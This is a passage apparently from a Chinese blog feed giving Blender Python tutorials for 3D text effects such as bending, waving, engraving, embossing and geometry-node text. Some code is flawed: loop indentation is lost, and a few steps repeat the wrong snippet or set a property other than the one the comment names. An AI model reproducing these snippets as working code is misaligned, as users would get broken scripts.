    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier_geometrynodes.node_group

    # delete Group Input
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 String to Curves 节点
    string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
    string_to_curves_node.location = (-400, 50)

    string_to_curves_node.align_x = "CENTER"
    string_to_curves_node.align_y = "MIDDLE"
    string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
    string_to_curves_node.inputs[1].default_value = 2.2

    string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (-150, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (50, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (250, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (250, -100)

    # 创建 Join Geometry 节点
    join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
    join_geometry_node.location = (450, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (650, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (850, 50)

    # get output node
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1050, 50)

    # 连接节点
    node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
    node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

    [3.x] Create Multi-line Text Using Geometry Nodes In Blender | Easy Step-by-Step Tutorial

    调整之前的 Geometry Node,使其可以多行显示文字:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    import bpy
    import os
    import numpy as np

    # 获取当前选中的网格对象
    bpy.ops.mesh.primitive_cube_add()
    text_obj = bpy.context.object

    # 创建 Geometry Nodes 网络
    text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
    bpy.ops.node.new_geometry_node_group_assign()
    node_tree = text_modifier_geometrynodes.node_group

    # delete Group Input
    node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

    # 创建 Special Characters 节点
    special_characters_node = node_tree.nodes.new(type='FunctionNodeInputSpecialCharacters')
    special_characters_node.location = (-800, 200)

    # 创建 String to Curves 节点
    string_to_curves_nodes = []
    for i in range(2):
    string_to_curves_nodes.append(node_tree.nodes.new(type='GeometryNodeStringToCurves'))
    string_to_curves_nodes[-1].location = (-400, 350 - 400 * i)
    string_to_curves_nodes[-1].align_x = "CENTER"
    string_to_curves_nodes[-1].align_y = "MIDDLE"
    string_to_curves_nodes[-1].inputs[1].default_value = 2.2
    string_to_curves_nodes[0].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Neon_Future.ttf')))
    string_to_curves_nodes[1].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './fonts/Ourland.otf')))

    # 创建 Resample Curve 节点
    resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
    resample_curve_node.location = (250, 50)

    resample_curve_node.mode = "EVALUATED"

    # 创建 Fill Curve 节点
    fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
    fill_curve_node.location = (450, 50)

    # 创建 Extrude Mesh 节点
    extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
    extrude_mesh_node.location = (650, 150)

    extrude_mesh_node.inputs[3].default_value = 0.4
    extrude_mesh_node.inputs[4].default_value = False

    # 创建 Flip Faces 节点
    flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
    flip_faces_node.location = (650, -100)

    # 创建 Join Geometry 节点
    join_geometry_nodes = []
    for i in range(2):
    join_geometry_nodes.append(node_tree.nodes.new(type='GeometryNodeJoinGeometry'))
    join_geometry_nodes[0].location = (50, 50)
    join_geometry_nodes[1].location = (850, 50)

    # 创建 Realize Instances 节点
    realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
    realize_instances_node.location = (1050, 50)

    # 创建 Merge by Distance 节点
    merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
    merge_by_distance_node.location = (1250, 50)

    # get output node
    output_node = node_tree.nodes.get("Group Output")
    output_node.location = (1450, 50)

    # 创建 String 节点
    string_nodes = []
    for i in range(3):
    string_nodes.append(node_tree.nodes.new(type='FunctionNodeInputString'))
    string_nodes[-1].location = (-800, -150 * i + 50)
    string_nodes[0].string = 'Taco'
    string_nodes[1].string = 'Tuesday!'
    string_nodes[2].string = 'gigigigigi~'

    # 创建 Join Strings 节点
    join_strings_node = node_tree.nodes.new(type='GeometryNodeStringJoin')
    join_strings_node.location = (-600, 75)

    # 创建 Set Position 节点
    set_position_nodes = []
    for i in range(2):
    set_position_nodes.append(node_tree.nodes.new(type='GeometryNodeSetPosition'))
    set_position_nodes[-1].location = (-150, -250 * i + 200)
    set_position_nodes[0].inputs[3].default_value[1] = 2
    set_position_nodes[1].inputs[3].default_value[1] = -1

    # 连接节点
    node_tree.links.new(special_characters_node.outputs[0], join_strings_node.inputs[0])
    node_tree.links.new(string_nodes[1].outputs[0], join_strings_node.inputs[1])
    node_tree.links.new(string_nodes[0].outputs[0], join_strings_node.inputs[1])
    node_tree.links.new(string_nodes[2].outputs[0], string_to_curves_nodes[1].inputs[0])
    node_tree.links.new(join_strings_node.outputs[0], string_to_curves_nodes[0].inputs[0])
    node_tree.links.new(string_to_curves_nodes[0].outputs[0], set_position_nodes[0].inputs[0])
    node_tree.links.new(string_to_curves_nodes[1].outputs[0], set_position_nodes[1].inputs[0])
    node_tree.links.new(set_position_nodes[0].outputs[0], join_geometry_nodes[0].inputs[0])
    node_tree.links.new(set_position_nodes[1].outputs[0], join_geometry_nodes[0].inputs[0])
    node_tree.links.new(join_geometry_nodes[0].outputs[0], resample_curve_node.inputs[0])
    node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
    node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
    node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_nodes[1].inputs[0])
    node_tree.links.new(flip_faces_node.outputs[0], join_geometry_nodes[1].inputs[0])
    node_tree.links.new(join_geometry_nodes[1].outputs[0], realize_instances_node.inputs[0])
    node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
    node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

    # 创建 Bevel modifier

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True

    # 创建 SimpleDeform modifier,使文本弯曲

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

    Create Wavy or Curvy Text In Blender | Easy Tutorial On Wave Modifier | Dancing Text | Waving Text

    1. 新建一个 Text 对象,调整其文字, BevelAlignment

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    1. 给它一个 Wave 修改器,调整其参数,就会获得一个波浪动画效果:

    png

    1
    2
    3
    4
    5
    6
    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2
    1. 如果要将它立起来,先转成 Mesh

    png

    1
    text_obj.rotation_euler[0] = np.pi / 2
    1. 删除多余的边:MeshMergeBy distance

    png

    1
    2
    3
    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    1. 调整其 RotationObjectApplyAll Transforms

    png

    1
    2
    3
    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()
    1. 添加 Wave

    png

    1
    2
    3
    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()

    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

    Easy Method to Engrave Your Text or Logo | How To Carve Any Text | 3D Text Effects In Blender

    1. 新建一个 Text 对象,设置其内容,AlignmentLocation

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    text_obj.data.extrude = 0.3
    1. 转换为 MESH

    png

    1
    bpy.ops.object.convert(target="MESH")
    1. 按住 X 右键,删除 Limit Dissolve

    png

    1
    2
    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

    4.MeshMergeBy Distance

    png

    png

    1
    2
    3
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.object.editmode_toggle()
    1. 按住 E 网上拖,获得 Extrude

    png

    1
    2
    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()
    1. 新建一个 Cube,设置其 Scale

    png

    1
    2
    3
    4
    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]
    1. 设置 Boolean

    png

    1
    2
    3
    4
    5
    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()
    1. 设置材质,应用 Boolean

    png

    1
    2
    3
    4
    5
    6
    7
    8
    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)
    1. 应用 Scale

    png

    1
    bpy.ops.object.transform_apply()
    1. 设置 Bevel 及其相关参数:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True
    1. 导出 .glb 格式,可被 3D Viewer 读取。

    png

    1
    2
    bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './outputs/1')))

    完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    # text_obj.data.extrude = 0.3

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]

    cube_material = bpy.data.materials.new(name="Material")
    cube_material.use_nodes = True
    nodes = cube_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

    cube_obj.data.materials.append(cube_material)

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath))
    , './outputs/1')))

    Easy Method to Emboss Your Text or Logo | How To Create Raised Letters | 3D Text Effects In Blender

    emmmm 差不多就是把上一个的 Boolean 中的 DIfference 改为 UNION。如果有破,要自己修复:

    png

    ]]>
    @@ -6153,7 +6153,7 @@ /posts/Blender-Text%20Effects%20In%20Blender%20(1-6)/ - 资源

    课程

    Linux 下安装 bpy

    Releases · TylerGubala/blenderpy (github.com) 下载静态安装包,然后:

    pip install bpy-2.91a0-cp37-cp37m-manylinux2014_x86_64.whl && bpy_post_install

    Create Curved Text In Blender | Bend Any Text | Part 1 in Text Effects | Two Easy Methods Explained

    创建文本对象

    1. 创建一个 Text 对象:

    png

    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object
    1. 将这个 Text 对象的 Rotation XZ 设为 90°

    png

    import numpy as np

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    1. 将文字设为居中对齐:

    png

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    1. 将这个 TextGeometryExtrude 设为 0.1 m,使其具有厚度。

    png

    text_obj.data.extrude = 0.1
    1. 切换到 Edit Mode,可以更改其文字内容。

    png

    text_obj.data.body = "Hello,\nWorld!"

    直接弯曲

    1. Text 对象添加一个 Simple DeformModifier

    png

    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")
    1. 设置其属性:

    png

    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4

    得到弯曲后的文本:

    png


    完整代码:

    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")

    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4

    沿 Bezier 曲线弯曲

    1. 新建一个 Circle 对象,将其 Rotation Z 设为 90°

    png

    bpy.ops.curve.primitive_bezier_circle_add()
    curve_obj = bpy.context.object

    curve_obj.rotation_euler[2] = np.pi / 2
    1. Text 对象添加一个 Modifier,选择 Curve,然后选择之前新建的 BezierCircle 对象:

    png

    curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
    curve_modifier.object = curve_obj

    此时 Text 对象就会沿着 BezierCircle 曲线变形:

    png

    1. 选中 BezierCircle 对象,切换到 Edit Mode,选择 SegmentsSwitch Direction,便可切换文字方向:

    png

    bpy.ops.object.editmode_toggle()
    bpy.ops.curve.switch_direction()
    bpy.ops.object.editmode_toggle()
    1. 修改 BezierCircleScaleText 对象也会随之变化:

    png

    curve_obj.delta_scale[0:3] = [2, 2, 2]

    完整代码:

    import bpy
    import numpy as np

    # 新建一个 TextCurve 对象
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    # 修改文本位置和旋转角度
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    # 修改文本对齐方式
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    # 挤出文本
    text_obj.data.extrude = 0.1

    # 设置文本内容
    text_obj.data.body = "Hello,\nWorld!"

    # 创建一个圆形对象
    bpy.ops.curve.primitive_bezier_circle_add()
    curve_obj = bpy.context.object

    # 旋转该圆形对象
    curve_obj.rotation_euler[2] = np.pi / 2

    # 让文本沿着圆形变换
    curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
    curve_modifier.object = curve_obj

    # 修改方向
    bpy.ops.object.editmode_toggle()
    bpy.ops.curve.switch_direction()
    bpy.ops.object.editmode_toggle()

    # 修改圆形大小
    curve_obj.delta_scale[0:3] = [2, 2, 2]

    Add Text To Any Curved Surface In Blender | Part 2 in Text Effects | Blender Eevee & Cycles

    1. 新建一个茶壶:
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_teapot_add()
    teapot_obj = bpy.context.object
    1. 新建一个文本对象,设置其对齐、位置(使其靠近茶壶表面)、旋转、挤出、文字内容、行间距等:

    png

    png

    png

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.location[1] = -2
    text_obj.location[2] = 1.5

    text_obj.rotation_euler[0] = np.pi / 2

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.space_line = 0.75
    1. 给文字对象添加一个红色的材质,此时转到渲染窗口,文字就会呈现红色:

    png

    text_material = bpy.data.materials.new(name="TextMaterial")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

    text_obj.data.materials.append(text_material)
    1. 新建一个 EmptyCube,设置其位置使其和 Text 相同,设置其旋转角,用于控制 Text 的旋转:

    png

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[1] = -2
    empty_obj.location[2] = 1.5

    empty_obj.rotation_euler[0] = np.pi / 2
    empty_obj.rotation_euler[2] = np.pi / 2
    1. Text 对象添加 modifier:
    • Remesh:用于使字体集合与弯曲操作兼容,选择 SharpOctree Depth 设为 8

    png

    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
    • SimpleDeform:用于字体弯曲,选择 BendOrigin 选择 Empty 对象,Axis 选择 Y 轴:

    png

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.deform_axis = "Y"
    • Shrinkwrap:使得文字映射到 teapot 上,Wrap Method 选择 Target Normal ProjectTarget 选择 Teapot 对象,Offset 选择 0.1 m:

    png

    text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
    text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
    text_modifier_shrink_wrap.target = teapot_obj
    text_modifier_shrink_wrap.offset = 0.1

    png


    完整代码:

    import bpy
    import numpy as np

    # 新建 teapot 对象
    bpy.ops.mesh.primitive_teapot_add()
    teapot_obj = bpy.context.object

    # 新建 text 对象
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    # 居中对齐
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    # 设置位置
    text_obj.location[1] = -2
    text_obj.location[2] = 1.5

    # 设置旋转角
    text_obj.rotation_euler[0] = np.pi / 2

    # 设置挤出举例
    text_obj.data.extrude = 0.1

    # 设置文本内容
    text_obj.data.body = "Hello,\nWorld!"

    # 设置行间距
    text_obj.data.small_caps_scale = 0.75

    # 新建材质
    text_material = bpy.data.materials.new(name="TextMaterial")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

    # 给文本添加材质
    text_obj.data.materials.append(text_material)

    # 新建 empty 对象
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    # 设置 empty 位置
    empty_obj.location[1] = -2
    empty_obj.location[2] = 1.5

    # 设置 empty 旋转角
    empty_obj.rotation_euler[0] = np.pi / 2
    empty_obj.rotation_euler[2] = np.pi / 2

    # 新建 Remesh 的 modifier
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False

    # 新建 SimpleDeform 的 modifier
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.deform_axis = "Y"

    # 新建 Shrinkwrap 的 modifier
    text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
    text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
    text_modifier_shrink_wrap.target = teapot_obj
    text_modifier_shrink_wrap.offset = 0.1

    Engrave & Emboss Text Easily In Blender | Part 3 in Text Effects | Create 3D Text Logo In Blender

    1. 新建一个 Cube,并调整其 Scale

    png

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5
    1. 新建一个 Text,调整其 Transform

    png

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    使其居中对齐:

    png

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    设置文字内容:

    png

    text_obj.data.body = "Hello,\nWorld!"
    1. 修改完文字内容后,将其转换成 Mesh,随后文字内容就不能再改变!

    png

    bpy.ops.object.convert(target="MESH")
    1. 应用 Decimate 以减少过多的顶点:

    png

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    1. Edit Mode 下,选择 Text 对象下的所有顶点,MeshMergeBy Distance

    png

    在对话框中选择 0.01 m。

    png

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    1. MeshDeleteLimited Dissolve

    png

    在对话框中选择 Max Angle10°

    png

    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()
    1. Text 添加一个 Solidfy,使其具有高度:

    png

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2
    1. Object Mode 下,给 TextCude 使用 Shade Smooth

    png

    png

    png

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True
    1. Cude 添加 Boolean,关闭 Text 的显示,形成雕刻效果:

    png

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    1. Cude 添加 Bevel,形成斜角效果:

    png

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True
    1. Boolean 改为 Union,形成浮雕效果:

    png

    cube_modifier_boolean.operation = "UNION"

    emmmm 如果破了的话好像只能手动处理了。

    png


    完整代码:

    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
